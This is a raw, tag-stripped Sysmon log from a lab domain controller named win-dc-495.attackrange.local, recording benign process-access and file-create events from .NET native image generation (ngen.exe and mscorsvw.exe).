13:46:01.781{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.750{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.672{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.672{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.078{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.078{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.609{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:02.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:02.484{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ed4-0\Microsoft.Activities.Build.dll2021-01-18 13:46:02.484 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
